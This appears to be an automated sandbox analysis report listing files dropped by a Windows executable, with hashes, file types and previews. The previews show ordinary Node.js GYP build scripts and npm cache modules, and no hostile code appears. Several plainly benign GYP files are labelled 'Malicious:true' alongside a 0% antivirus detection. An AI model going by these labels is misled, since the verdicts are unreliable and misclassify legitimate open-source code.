              SHA-512:9ADFE196371279DD9B7CCCCFDFAFC4F8AB9F93FD4582A0C6FBBF4C52DFBE493F82DBBE9AAE9113C1AFE73AE5F40ACB6DE7DB574A5CA4E782EB78FB37EEAC9173
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) 2020 Node.js contributors. All rights reserved..Copyright (c) 2009 Google Inc. All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are.met:.. * Redistributions of source code must retain the above copyright.notice, this list of conditions and the following disclaimer.. * Redistributions in binary form must reproduce the above.copyright notice, this list of conditions and the following disclaimer.in the documentation and/or other materials provided with the.distribution.. * Neither the name of Google Inc. nor the names of its.contributors may be used to endorse or promote products derived from.this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS."AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.A PARTICULAR P
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):653
              Entropy (8bit):4.701502158373634
              Encrypted:false
              SSDEEP:
              MD5:DDC9728B59DACC312963444709527F45
              SHA1:DF68A5AEADFC72A0005AD6E0F9574FF26AE78E09
              SHA-256:E1C759DDA39FA50264575092A136E33F28211139B332D88E933A1B953D564F90
              SHA-512:3F35133EFD0741246DA0103869E42FA8BDAD5CCA6F08384A07441B11D0687829D0BB9A176164FB544FF0A57A08C525B8ABD618677E42008B5785FBB59C68FFE0
              Malicious:false
              Reputation:unknown
              Preview:// Copyright (c) 2013 Google Inc. All rights reserved..// Use of this source code is governed by a BSD-style license that can be.// found in the LICENSE file...// This file is used to generate an empty .pdb -- with a 4KB pagesize -- that is.// then used during the final link for modules that have large PDBs. Otherwise,.// the linker will generate a pdb with a page size of 1KB, which imposes a limit.// of 1GB on the .pdb. By generating an initial empty .pdb with the compiler.// (rather than the linker), this limit is avoided. With this in place PDBs may.// grow to 2GB..//.// This file is referenced by the msvs_large_pdb mechanism in MSVSUtil.py..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:POSIX shell script, ASCII text executable
              Category:dropped
              Size (bytes):240
              Entropy (8bit):4.991608280796646
              Encrypted:false
              SSDEEP:
              MD5:E59B12333255202A298DAA1C3557940A
              SHA1:EEDFFC4EC86C7A01539FD6487780F1FBFFDBFDEE
              SHA-256:38E8B886CF06FE7CEC4D89634FD2850891706308E2BBBC0556B3D299BD6A7993
              SHA-512:B23F798613D79055CA79F118CC938B7E269D1A0A316A8022103E40970251F61D85C3F8FE7892F52BBF4E028A9B04D6D871F862E6DDDA02EC04708DEAE912D579
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/bin/sh.# Copyright 2013 The Chromium Authors. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...set -e.base=$(dirname "$0").exec python "${base}/gyp_main.py" "$@".
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:DOS batch file, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):201
              Entropy (8bit):4.921719222002603
              Encrypted:false
              SSDEEP:
              MD5:962AC97BA2737832F3233916D7C56494
              SHA1:2ABA80F0187605B8EACA0015060D5CB06A50CF31
              SHA-256:77BF45E8C077DF03D65E6C076920F24BEE04752E29BCB21B63D3622FFFE84F10
              SHA-512:CD7CD6619223FBDFEA5118397431BE7A26A3DFC1E6D653D40460C29FB1CF1F99662D6621149764AAA347092C9CBF4FFCEE37415D6862821A5CEE5B51CE8DA777
              Malicious:false
              Reputation:unknown
              Preview:@rem Copyright (c) 2009 Google Inc. All rights reserved...@rem Use of this source code is governed by a BSD-style license that can be..@rem found in the LICENSE file.....@python "%~dp0gyp_main.py" %*..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Python script, ASCII text executable
              Category:dropped
              Size (bytes):1250
              Entropy (8bit):4.785433351764051
              Encrypted:false
              SSDEEP:
              MD5:E5185657C4ED44D644551BDBFEABD9C7
              SHA1:C428C3FF274211B9C8059A279B6455087BFB5EC7
              SHA-256:4CA6A9DFDBB18041C11BBD4BD841EC0CD96AEAB8CEE750DFC48A8D02A99551E4
              SHA-512:67CAA69489D1E45D84C293D458747CFCF611EF2493091BBD22952ECEC94BD552E5E5393F8F330B4B1FF272108AD414D6089F07CCA3DA608D2598BADDD0D9F315
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env python3..# Copyright (c) 2009 Google Inc. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...import os.import sys.import subprocess...def IsCygwin():. # Function copied from pylib/gyp/common.py. try:. out = subprocess.Popen(. "uname", stdout=subprocess.PIPE, stderr=subprocess.STDOUT. ). stdout, _ = out.communicate(). return "CYGWIN" in stdout.decode("utf-8"). except Exception:. return False...def UnixifyPath(path):. try:. if not IsCygwin():. return path. out = subprocess.Popen(. ["cygpath", "-u", path], stdout=subprocess.PIPE, stderr=subprocess.STDOUT. ). stdout, _ = out.communicate(). return stdout.decode("utf-8"). except Exception:. return path...# Make sure we're using the version of pylib in this repo, not one installed.# elsewhere on the system. Also convert to Unix style
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Python script, ASCII text executable
              Category:dropped
              Size (bytes):22750
              Entropy (8bit):4.554217734470446
              Encrypted:false
              SSDEEP:
              MD5:254FF5E23A607CC24F3E1B002D763AE5
              SHA1:5CA48F517579342A9F7396711D741B7199F10B42
              SHA-256:E08AEB29756606623F4F68DE48258E07D89E72CE8AF61DF84B3B3A55E87D3FE2
              SHA-512:1A56B4F66450F1F299A298BF3700CCAB3EF96478FFC12BA63A471553374927D7F86B136E8B5B956C0E079EA4A83E4E6F2F7A04E593D541D87108B17602DCD34A
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:# Copyright (c) 2012 Google Inc. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...import errno.import filecmp.import os.path.import re.import tempfile.import sys.import subprocess..from collections.abc import MutableSet...# A minimal memoizing decorator. It'll blow up if the args aren't immutable,.# among other "problems"..class memoize:. def __init__(self, func):. self.func = func. self.cache = {}.. def __call__(self, *args):. try:. return self.cache[args]. except KeyError:. result = self.func(*args). self.cache[args] = result. return result...class GypError(Exception):. """Error class representing an error, which is to be presented. to the user. The main entry point will catch and display this.. """.. pass...def ExceptionAppend(e, msg):. """Append a message to the given exception's message.""". if not e.args:. e
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Python script, ASCII text executable
              Category:dropped
              Size (bytes):2162
              Entropy (8bit):4.6095332192285055
              Encrypted:false
              SSDEEP:
              MD5:AD924DF25F48B2ECC8BF9D2C673BE526
              SHA1:827214D910707FA2515857D2E28FA3E347C27CF9
              SHA-256:044F51B104BF0ADAFA76F618BE708FC1ECEBDCA1C6D13C2E3B717DDD1313440D
              SHA-512:2CC8C12F8712C0D706BD2CA24C8FA0219A60ABF46DDB6FB035D1193F05EE7D82A47FAEDA599A556085ABB9077096C205FAEB2B950A67455958D1C268D9C0B455
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env python3..# Copyright (c) 2012 Google Inc. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""Unit tests for the common.py file."""..import gyp.common.import unittest.import sys...class TestTopologicallySorted(unittest.TestCase):. def test_Valid(self):. """Test that sorting works on a valid graph with one possible order.""". graph = {. "a": ["b", "c"],. "b": [],. "c": ["d"],. "d": ["b"],. }.. def GetEdge(node):. return tuple(graph[node]).. self.assertEqual(. gyp.common.TopologicallySorted(graph.keys(), GetEdge), ["a", "c", "d", "b"]. ).. def test_Cycle(self):. """Test that an exception is thrown on a cyclic graph.""". graph = {. "a": ["b"],. "b": ["c"],. "c": ["d"],. "d": ["a"],. }.. def GetEdge(node):.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Python script, ASCII text executable
              Category:dropped
              Size (bytes):5287
              Entropy (8bit):4.6185826188314225
              Encrypted:false
              SSDEEP:
              MD5:2F3AFD5DA346C0991836F7028C9C57F8
              SHA1:FB525F875D1A72FCB393D578C904315B90C3666E
              SHA-256:34CB72F8BDF511E79B90148716C4EB34FE74FE0D990E8038060D2DB4983BD795
              SHA-512:A318F5942756B5F57E33E529A0CB20C88DC97305AD1D86C07E66F8FF0C1B33247747E2F1A507CB4129D886CD3D0E253A8AFC063189994C60F09D4AA4BF156A7A
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:# Copyright (c) 2011 Google Inc. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...import sys.import re.import os.import locale.from functools import reduce...def XmlToString(content, encoding="utf-8", pretty=False):. """ Writes the XML content to disk, touching the file only if it has changed... Visual Studio files have a lot of pre-defined structures. This function makes. it easy to represent these structures as Python data structures, instead of. having to create a lot of function calls... Each XML element of the content is represented as a list composed of:. 1. The name of the element, a string,. 2. The attributes of the element, a dictionary (optional), and. 3+. The content of the element, if any. Strings are simple text nodes and. lists are child elements... Example 1:. <test/>. becomes. ['test'].. Example 2:. <myelement a='value1' b='value2'>. <childtype>This is</
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Python script, ASCII text executable
              Category:dropped
              Size (bytes):3709
              Entropy (8bit):4.6801615799193055
              Encrypted:false
              SSDEEP:
              MD5:4FE7E6F34817DF9DBD74C7A4E79402D0
              SHA1:6747C2F1BEBAF1DD07C4A725AB050332F40C0203
              SHA-256:2EA64CC7BADDD528BBD00E222E7E6C9FAB38F80720397D251EEAB74DCDDC5570
              SHA-512:B92BC8CB067C8054E447AD5BF45F005F9149901DDA47A3583EE813A3437C3CED7117F854ED692377C18642C4F2709633A9C00C4CCEF5BC1DE6B9ABBF2F8FC7CD
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env python3..# Copyright (c) 2011 Google Inc. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...""" Unit tests for the easy_xml.py file. """..import gyp.easy_xml as easy_xml.import unittest..from io import StringIO...class TestSequenceFunctions(unittest.TestCase):. def setUp(self):. self.stderr = StringIO().. def test_EasyXml_simple(self):. self.assertEqual(. easy_xml.XmlToString(["test"]),. '<?xml version="1.0" encoding="utf-8"?><test/>',. ).. self.assertEqual(. easy_xml.XmlToString(["test"], encoding="Windows-1252"),. '<?xml version="1.0" encoding="Windows-1252"?><test/>',. ).. def test_EasyXml_simple_with_attributes(self):. self.assertEqual(. easy_xml.XmlToString(["test2", {"a": "value1", "b": "value2"}]),. '<?xml version="1.0" encoding="utf-8"?><test2 a="value1" b="value2"/>',.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Python script, ASCII text executable
              Category:dropped
              Size (bytes):1886
              Entropy (8bit):4.876904449204721
              Encrypted:false
              SSDEEP:
              MD5:E85C0FEF288CCD17ACEF0FFFC90853B0
              SHA1:1C5E8A0201049A8D3A0F38FFAAED481E3367B56F
              SHA-256:36A3F8725C44FBAA555D57C39C3896D170283E164C53FF3EBE59CB43DB393C1A
              SHA-512:419CF5B5847B1FD242DB1F49694141DF65425139319EE91C15DE86D9FF943B5C87007CA26D5AC5A7A9A886389CBDB7F3872635AE33B7C204A7D059910E2EFCC7
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env python3.# Copyright (c) 2011 Google Inc. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""These functions are executed via gyp-flock-tool when using the Makefile.generator. Used on systems that don't have a built-in flock."""..import fcntl.import os.import struct.import subprocess.import sys...def main(args):. executor = FlockTool(). executor.Dispatch(args)...class FlockTool:. """This class emulates the 'flock' command.""".. def Dispatch(self, args):. """Dispatches a string command to a method.""". if len(args) < 1:. raise Exception("Not enough arguments").. method = "Exec%s" % self._CommandifyName(args[0]). getattr(self, method)(*args[1:]).. def _CommandifyName(self, name_string):. """Transforms a tool name like copy-info-plist to CopyInfoPlist""". return name_string.title().replace("-", "").. def ExecFlock(self, lockfile,
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Python script, ASCII text executable
              Category:dropped
              Size (bytes):31684
              Entropy (8bit):4.529920327926916
              Encrypted:false
              SSDEEP:
              MD5:049170372820C89CCE25D22DD66F2C66
              SHA1:80DFE4904FD9EC7CEE50F5BE1B3B8A26EF97E2C8
              SHA-256:78608EED439D56E9D8653ECFF61E8E35620E37C5C21F78B47F2C8D3C35289D6B
              SHA-512:2CA9C51922E89B24E798C3C4728A31232684E9CFB393859AA5C76FC062BD10AF2C4C192EAFD6F55DAC5DAB31C03672D698204A594BB5898FC094EF80D0E30B9D
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:# Copyright (c) 2014 Google Inc. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...""".This script is intended for use as a GYP_GENERATOR. It takes as input (by way of.the generator flag config_path) the path of a json file that dictates the files.and targets to search for. The following keys are supported:.files: list of paths (relative) of the files to search for..test_targets: unqualified target names to search for. Any target in this list.that depends upon a file in |files| is output regardless of the type of target.or chain of dependencies..additional_compile_targets: Unqualified targets to search for in addition to.test_targets. Targets in the combined list that depend upon a file in |files|.are not necessarily output. For example, if the target is of type none then the.target is not output (but one of the descendants of the target will be)...The following is output:.error: only supplied if there is an erro
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Python script, ASCII text executable
              Category:dropped
              Size (bytes):49966
              Entropy (8bit):4.576266628485825
              Encrypted:false
              SSDEEP:
              MD5:48688A9A28A7A8A8A6DC2B052CA50F42
              SHA1:7973C746E29B5BDDDAC6786998E48329FF28ED62
              SHA-256:0FEB8CCD3E6819134252B5142BCF0DD7AC1442445D7C51722595B42023CCA1EF
              SHA-512:3E7DFCB84652518D02BA3E299DE746C7880EF5374735D49067A54AB2D43BBAD68F18FE4468EE6836044FBCE4867D3BC5B732045B3C705DCA4B5490FA0BD2B8BE
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:# Copyright (c) 2012 Google Inc. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...# Notes:.#.# This generates makefiles suitable for inclusion into the Android build system.# via an Android.mk file. It is based on make.py, the standard makefile.# generator..#.# The code below generates a separate .mk file for each target, but.# all are sourced by the top-level GypAndroid.mk. This means that all.# variables in .mk-files clobber one another, and furthermore that any.# variables set potentially clash with other Android build system variables..# Try to avoid setting global variables where possible....import gyp.import gyp.common.import gyp.generator.make as make # Reuse global functions from make backend..import os.import re.import subprocess..generator_default_variables = {. "OS": "android",. "EXECUTABLE_PREFIX": "",. "EXECUTABLE_SUFFIX": "",. "STATIC_LIB_PREFIX": "lib",. "SHARED_LIB_PREFIX": "lib"
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Python script, ASCII text executable
              Category:dropped
              Size (bytes):49248
              Entropy (8bit):4.716376092886047
              Encrypted:false
              SSDEEP:
              MD5:CEBE4DC701C05DDD544EE7D16898283E
              SHA1:7FC54371EBBCCA33C366C6E8870A1BCCE1D79E1A
              SHA-256:71A141AC5435DCC7F0BA99F33AC94F3F81E8D4A4B1EBD679C59E8652B37DE4B3
              SHA-512:0BA58D16B514189BFBDAC0E5A7837CA48F3D24E4E431077AA6D198AE31CD52190690086B5E1745839002700A0B81727C5320C7A5571D04582F5C7A3AE3249A97
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:# Copyright (c) 2013 Google Inc. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""cmake output module..This module is under development and should be considered experimental...This module produces cmake (2.8.8+) input as its output. One CMakeLists.txt is.created for each configuration...This module's original purpose was to support editing in IDEs like KDevelop.which use CMake for project management. It is also possible to use CMake to.generate projects for other IDEs such as eclipse cdt and code::blocks. QtCreator.will convert the CMakeLists.txt to a code::blocks cbp for the editor to read,.but build using CMake. As a result QtCreator editor is unaware of compiler.defines. The generated CMakeLists.txt can also be used to build on Linux. There.is currently no support for building on platforms other than Linux...The generated CMakeLists.txt should properly compile all projects. However,.there is a mismatch bet
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Python script, ASCII text executable
              Category:dropped
              Size (bytes):4591
              Entropy (8bit):4.873481397737619
              Encrypted:false
              SSDEEP:
              MD5:4549573FE350BF1C16AD3E0FADFE6A51
              SHA1:58A73A3900A686AE9ABC17AD5FD3F27D4C4EB8ED
              SHA-256:C6B654088D7E21B9A4672C00D5D227539005A068C463423F9FFED6FDB22224FF
              SHA-512:3A96AD3B8F4502C90DB05A3DB589F2210A1B59DD4706EBD17A574A1543223B6C65EA3C538B99BF86AD12CF98588EA03B2E87BA80AA7B16CD375ABE5A7968DA52
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:# Copyright (c) 2016 Ben Noordhuis <info@bnoordhuis.nl>. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file...import gyp.common.import gyp.xcode_emulation.import json.import os..generator_additional_non_configuration_keys = [].generator_additional_path_sections = [].generator_extra_sources_for_rules = [].generator_filelist_paths = None.generator_supports_multiple_toolsets = True.generator_wants_sorted_dependencies = False..# Lifted from make.py. The actual values don't matter much..generator_default_variables = {. "CONFIGURATION_NAME": "$(BUILDTYPE)",. "EXECUTABLE_PREFIX": "",. "EXECUTABLE_SUFFIX": "",. "INTERMEDIATE_DIR": "$(obj).$(TOOLSET)/$(TARGET)/geni",. "PRODUCT_DIR": "$(builddir)",. "RULE_INPUT_DIRNAME": "%(INPUT_DIRNAME)s",. "RULE_INPUT_EXT": "$(suffix $<)",. "RULE_INPUT_NAME": "$(notdir $<)",. "RULE_INPUT_PATH": "$(abspath $<)",. "RULE_INPUT_ROOT": "%(INPUT_ROOT)s",. "SHARE
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Python script, ASCII text executable
              Category:dropped
              Size (bytes):3101
              Entropy (8bit):4.9454109547412495
              Encrypted:false
              SSDEEP:
              MD5:56C00134403C179A7C662154A73F7FCF
              SHA1:BD8326E5505D6E8694A7A6C0964E8ACBAEC4738B
              SHA-256:3D5DA711E2C0DFA37651640E2EE5B90F0627BDF30EA856C4700F6992A29C61A5
              SHA-512:10A49966C17B727156C9F88D41CCAD87DC1C27544CA82D19751C3A492A4BA9B391E7DD7B13BB19DD90B032D8AEF8B3453850FB07CA302411AFDE45E9E115DB82
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:# Copyright (c) 2012 Google Inc. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file....import os.import gyp.import gyp.common.import gyp.msvs_emulation.import json..generator_supports_multiple_toolsets = True..generator_wants_static_library_dependencies_adjusted = False..generator_filelist_paths = {}..generator_default_variables = {}.for dirname in [. "INTERMEDIATE_DIR",. "SHARED_INTERMEDIATE_DIR",. "PRODUCT_DIR",. "LIB_DIR",. "SHARED_LIB_DIR",.]:. # Some gyp steps fail if these are empty(!).. generator_default_variables[dirname] = "dir".for unused in [. "RULE_INPUT_PATH",. "RULE_INPUT_ROOT",. "RULE_INPUT_NAME",. "RULE_INPUT_DIRNAME",. "RULE_INPUT_EXT",. "EXECUTABLE_PREFIX",. "EXECUTABLE_SUFFIX",. "STATIC_LIB_PREFIX",. "STATIC_LIB_SUFFIX",. "SHARED_LIB_PREFIX",. "SHARED_LIB_SUFFIX",. "CONFIGURATION_NAME",.]:. generator_default_variables[unused] = ""...def C
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Python script, ASCII text executable
              Category:dropped
              Size (bytes):17553
              Entropy (8bit):4.571722444119323
              Encrypted:false
              SSDEEP:
              MD5:BD857C8039B2DDBCA47032120C46DB57
              SHA1:8B2BA7BA4886618BFCB58AB480FC844596DA753D
              SHA-256:6A89E01FD06A90108DFC156EF344C9F6E838EB8B8A2AA35BF2CD1E05AAD6B028
              SHA-512:2C2221A246DA1CDA56454305C8BDD4DA8664457CB71E5F03395EFFBD50957871D826339982A36F9D7DB70F5D3109CB9B49F060032E8B043B8A098F67235584BA
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:# Copyright (c) 2012 Google Inc. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""GYP backend that generates Eclipse CDT settings files...This backend DOES NOT generate Eclipse CDT projects. Instead, it generates XML.files that can be imported into an Eclipse CDT project. The XML file contains a.list of include paths and symbols (i.e. defines)...Because a full .cproject definition is not created by this generator, it's not.possible to properly define the include dirs and symbols for each file.individually. Instead, one set of includes/symbols is generated for the entire.project. This works fairly well (and is a vast improvement in general), but may.still result in a few indexer issues here and there...This generator has no automated tests, so expect it to be broken.."""..from xml.sax.saxutils import escape.import os.path.import subprocess.import gyp.import gyp.common.import gyp.msvs_emulation.import shlex.i
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):9126
              Entropy (8bit):4.654330609781954
              Encrypted:false
              SSDEEP:
              MD5:E3581A4800E872C74D33D428A43C45BF
              SHA1:5C9D813706A32B323F641680649ADA4CEF02A065
              SHA-256:75F21C2EF3B790DFD8A5FEB97504988D904790F0D3D6468939177D7E9192A274
              SHA-512:133D25DEEA97D18B77FE6239EA481EA137270E3F331BE08D514080E78B98A4D0133306685D70176010A4BB999AF38921535F15720DCC173B0C3894F47816A2FA
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const crypto = require('crypto').const {. appendFile,. mkdir,. readFile,. readdir,. rm,. writeFile,.} = require('fs/promises').const { Minipass } = require('minipass').const path = require('path').const ssri = require('ssri').const uniqueFilename = require('unique-filename')..const contentPath = require('./content/path').const hashToSegments = require('./util/hash-to-segments').const indexV = require('../package.json')['cache-version'].index.const { moveFile } = require('@npmcli/fs')..module.exports.NotFoundError = class NotFoundError extends Error {. constructor (cache, key) {. super(`No cache entry for ${key} found in ${cache}`). this.code = 'ENOENT'. this.cache = cache. this.key = key. }.}..module.exports.compact = compact..async function compact (cache, key, matchFn, opts = {}) {. const bucket = bucketPath(cache, key). const entries = await bucketEntries(bucket). const newEntries = []. // we loop backwards because the bottom-most result is the
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4462
              Entropy (8bit):4.60813585744298
              Encrypted:false
              SSDEEP:
              MD5:182421852249BFB3B527C046C9CB37F1
              SHA1:065B24B2F79C0005B24F8BD80C271F3EAE43CE55
              SHA-256:4127C3ADB8BC9F530DCB6ED80A0C6C00288F1DB8C6939146957D03454CAC06C9
              SHA-512:4BA327B91B332C38C3F191D38F148D1F40E436A585DADE62F7BB07B35EEE25C62E10D8A252C0854673FE3A140BF9745AE3649E946A59BF54F7BAFEBFF9AB5F11
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const Collect = require('minipass-collect').const { Minipass } = require('minipass').const Pipeline = require('minipass-pipeline')..const index = require('./entry-index').const memo = require('./memoization').const read = require('./content/read')..async function getData (cache, key, opts = {}) {. const { integrity, memoize, size } = opts. const memoized = memo.get(cache, key, opts). if (memoized && memoize !== false) {. return {. metadata: memoized.entry.metadata,. data: memoized.data,. integrity: memoized.entry.integrity,. size: memoized.entry.size,. }. }.. const entry = await index.find(cache, key, opts). if (!entry) {. throw new index.NotFoundError(cache, key). }. const data = await read(cache, entry.integrity, { integrity, size }). if (memoize) {. memo.put(cache, entry, data, opts). }.. return {. data,. metadata: entry.metadata,. size: entry.size,. integrity: entry.integrity,. }.}.module.exports = getData..async
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):1471
              Entropy (8bit):5.050246964134743
              Encrypted:false
              SSDEEP:
              MD5:F88E90B0BA0199DFCA2BFB0AF44FDAE1
              SHA1:6BBF40E55F85BF5CF02CB3FAA24D375876FCD998
              SHA-256:557F83D6C97AF65727B5B330D540115D62F0BB00E874E0DA0157F1909B75AF19
              SHA-512:EDFC21824483DD4136EB5599CDB40ABCE8830D628A6CD7DC987FE3E3FB275C5160E6991682C7CE548EB822E31ECA79AAB15386575848B8681EE44298FBA6CD51
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const LRU = require('lru-cache')..const MEMOIZED = new LRU({. max: 500,. maxSize: 50 * 1024 * 1024, // 50MB. ttl: 3 * 60 * 1000, // 3 minutes. sizeCalculation: (entry, key) => key.startsWith('key:') ? entry.data.length : entry.length,.})..module.exports.clearMemoized = clearMemoized..function clearMemoized () {. const old = {}. MEMOIZED.forEach((v, k) => {. old[k] = v. }). MEMOIZED.clear(). return old.}..module.exports.put = put..function put (cache, entry, data, opts) {. pickMem(opts).set(`key:${cache}:${entry.key}`, { entry, data }). putDigest(cache, entry.integrity, data, opts).}..module.exports.put.byDigest = putDigest..function putDigest (cache, integrity, data, opts) {. pickMem(opts).set(`digest:${cache}:${integrity}`, data).}..module.exports.get = get..function get (cache, key, opts) {. return pickMem(opts).get(`key:${cache}:${key}`).}..module.exports.get.byDigest = getDigest..function getDigest (cache, integrity, opts) {. return pickMem(opts).get(
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):696
              Entropy (8bit):4.754780975968504
              Encrypted:false
              SSDEEP:
              MD5:1D8E64EA848E005E1D0A771F1465A577
              SHA1:CF9D2FE73FD6195F7B53C6B13CDA15F40802F8F8
              SHA-256:9BC9BAD862208B2EE66AEAE5222D8B1D8D1D288F335FDF3FF998AD200F71CE64
              SHA-512:2A0A1D57ED240C9A0E95F1B87306EB66583860C2C88148DB6EF5979F6F6F06E4BC6EEC9FE9D6F2AD21506C4234A88404FCD155DABD82D6B507D0BA53502AD5BE
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { withTempDir } = require('@npmcli/fs').const fs = require('fs/promises').const path = require('path')..module.exports.mkdir = mktmpdir..async function mktmpdir (cache, opts = {}) {. const { tmpPrefix } = opts. const tmpDir = path.join(cache, 'tmp'). await fs.mkdir(tmpDir, { recursive: true, owner: 'inherit' }). // do not use path.join(), it drops the trailing / if tmpPrefix is unset. const target = `${tmpDir}${path.sep}${tmpPrefix || ''}`. return fs.mkdtemp(target, { owner: 'inherit' }).}..module.exports.withTmp = withTmp..function withTmp (cache, opts, cb) {. if (!cb) {. cb = opts. opts = {}. }. return withTempDir(path.join(cache, 'tmp'), cb, opts).}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6710
              Entropy (8bit):4.697272215077479
              Encrypted:false
              SSDEEP:
              MD5:C3067368E574ACA2D0DE5BF837B2AEF3
              SHA1:BE0B21A75A7544E5FB7915E059C358236C329841
              SHA-256:898B7BF2CC4E694C80EEDD1EDB116C2BB3A6AAD0085488D1547E5755AB53338D
              SHA-512:7313672DFFDFD2EF948F62A57339669EF96DC3078DDA77B84A7BFB50A569E8EBF3D00224ACE32378D19249541380EEE121DDD808AAF13ACDEBF36110C5FC212D
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const {. mkdir,. readFile,. rm,. stat,. truncate,. writeFile,.} = require('fs/promises').const pMap = require('p-map').const contentPath = require('./content/path').const fsm = require('fs-minipass').const glob = require('./util/glob.js').const index = require('./entry-index').const path = require('path').const ssri = require('ssri')..const hasOwnProperty = (obj, key) =>. Object.prototype.hasOwnProperty.call(obj, key)..const verifyOpts = (opts) => ({. concurrency: 20,. log: { silly () {} },. ...opts,.})..module.exports = verify..async function verify (cache, opts) {. opts = verifyOpts(opts). opts.log.silly('verify', 'verifying cache at', cache).. const steps = [. markStartTime,. fixPerms,. garbageCollect,. rebuildIndex,. cleanTmp,. writeVerifile,. markEndTime,. ].. const stats = {}. for (const step of steps) {. const label = step.name. const start = new Date(). const s = await step(cache, opts). if (s) {. Object.keys(s
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):775
              Entropy (8bit):5.054477382320076
              Encrypted:false
              SSDEEP:
              MD5:72480347F4E847C91BBE6207B7567338
              SHA1:1696F694A30DB0EDFD6874F6D7794EFBE23236FC
              SHA-256:CDBC258D13806538E727964C2436A8806E6E2496CCD616224AACE6F7BF98DBC1
              SHA-512:3AD7417DDA1AE4D8F8C388F97D0B37F4757D3385C04A267B74B18CCB5ABEA901124D9C088F110EBE119E90310829C723F8D7F32DE5A887EF3155D6130983E43C
              Malicious:false
              Reputation:unknown
